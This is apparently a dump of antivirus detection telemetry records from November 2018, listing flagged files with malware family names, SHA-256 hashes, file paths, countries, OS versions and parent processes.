  Row(detection=Row(filename='avscan-20181102-060222-d5b26bec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060222-D5B26BEC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055744-2fdf06fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055744-2FDF06FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:23:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='00316e6fbe435d57bbb912cbcda39581b9a53a966d096e0c183a3913e42c127c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:17:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baru.exe', filepath='D:\\DATA_SHARE\\audit\\2016\\november\\BARU\\BARU.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:13:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:55:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dayd.exe', filepath='\\?\\J:\\العاب2\\Day D Time Mayhem\\DayD.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='42cc55055db8ffa24affda4f4ef6c0741024dae38e34a3077f326ab48bfe25f4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:06:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jamsostek.lpa.fix.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\LPA GAJI\\jamsostek.LPA.FIX\\jamsostek.LPA.FIX.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T20:42:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094502-9de32913', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_46754ccb\\AVSCAN-20181101-094440-9A1552E8\\AVSCAN-20181101-094502-9DE32913', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:45:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=644000, name='W32/Neshta.A.#M1.#R1'), hash='00de433c065d209a185b83b24fc54ac59a19fdb0073b4415d09537b31deef689', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\PROGRA~2\\\\\\\\Avira\\\\\\\\Launcher\\\\\\\\AVIRAS~2.EXE\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-01T16:45:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-15-13-53.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T09:23:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='misc.exe', filepath='E:\\MISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gf.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GF\\GF.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143131-6c24ff3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-142842-4F9964B3\\AVSCAN-20181101-143131-6C24FF3E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:31:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155355-acc1f4b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155355-ACC1F4B8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152051-1b49ed27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-152051-1B49ED27', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winbox.exe', filepath='H:\\شغل 2015\\winbox.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='51a3fcbf15e5376f577bfd3f6c7cf63ef31bea5864a277dea09834642b504d45', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:04:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:57:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155557-c14f9cef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155557-C14F9CEF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:46:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='u3 sej 2017 baru fazri.exe', filepath='E:\\U3 SEJ 2017 BARU fazri.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\PROGRAM FILES (X86)\\Avira\\ANTIVIR DESKTOP\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:18:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:18:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='putty.exe', filepath='H:\\putty.exe', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='77ce4135683e9eacca2bb102b4422901af013a53b50e242b875e2f0acbde0143', metadata=Row(cmdline=None, country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T16:35:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dogan_chris.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Dogan_Chris.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='a921e6759d3a6ab5a98dfb3058ccfb4bdf5287426ae7785d37f17f48becc13c4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110411-c737ce60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110411-C737CE60', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:21:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='temp.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\Version_3_2_1_50\\Temp\\Temp.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110122-1671b9fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_045ae3c8\\AVSCAN-20181101-110012-0DC52B01\\AVSCAN-20181101-110122-1671B9FA', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:01:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111922-3a35f2fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111922-3A35F2FA', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpqdirec.exe', filepath='C:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\Hpqdirec.exe', filesize=960000, name='W32/Sality.AT.#M1.#R1'), hash='ea3ab3441f0f6b330a73b8cd052afd7641997ad5904987dfb52b074cd3975623', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T11:21:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='D:\\Installations\\ZBrush\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Disque Dur FAC\\Logiciel\\Zbrush\\ZBrush 4R8 P2 + Keyshot Bridge\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T09:47:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142859-23b3bf1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142859-23B3BF1C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='blackshot.exe', filepath='\\?\\J:\\BlackShot\\System\\blackshot.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='ce1461e9bd747c352f8887d59d4b7df532dda9d5e8f8c9c82cbb06863b5e5494', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nst828F.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files\\Common Files\\McAfee\\AVSolution\\mcshield.exe', parentsize=1059168, timestamp='2018-11-01T07:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105901-a02d7924', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105901-A02D7924', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Dropbox\\NiceHash\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/systemstartup', country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-01T21:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ml_downloads.dll', filepath='C:\\Program Files (x86)\\Winamp\\Plugins\\ml_downloads.dll', filesize=300000, name='W32/Ramnit.C.#M1.#R1'), hash='54ec09487b15d56a42e9f86db8dd74e6503ff11e6be761779946e525c9a59fe8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:A\\\\\\/l5xIFMIEKLNt+w.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:18:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\Google Cache\\msiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:40:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mcecf21.exe', filepath='C:\\NOVA PASTA\\PVECF21\\BKPROG\\MCECF21.exe', filesize=13312000, name='W32/Sality.AT.#M1.#R1'), hash='cf106efc210b072d845b628018b40e1d82a58681b2bfed3dcf933471f26501e4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181105-15abd2a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4c67797a\\AVSCAN-20181101-181020-0FA36AC5\\AVSCAN-20181101-181105-15ABD2A2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:11:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0118534.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0118534.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:30:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235802-b1127706', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ac6b2a6\\AVSCAN-20181101-235126-892E0E87\\AVSCAN-20181101-235802-B1127706', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:58:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc801b15eb-a2ad-0c48-8789-782f5c5c6aa7.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc801B15EB-A2AD-0C48-8789-782F5C5C6AA7.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T12:59:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T01:14:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002229-387df0b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002229-387DF0B2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:36Z'), dt=datetime.date(2018, 11, 1)),
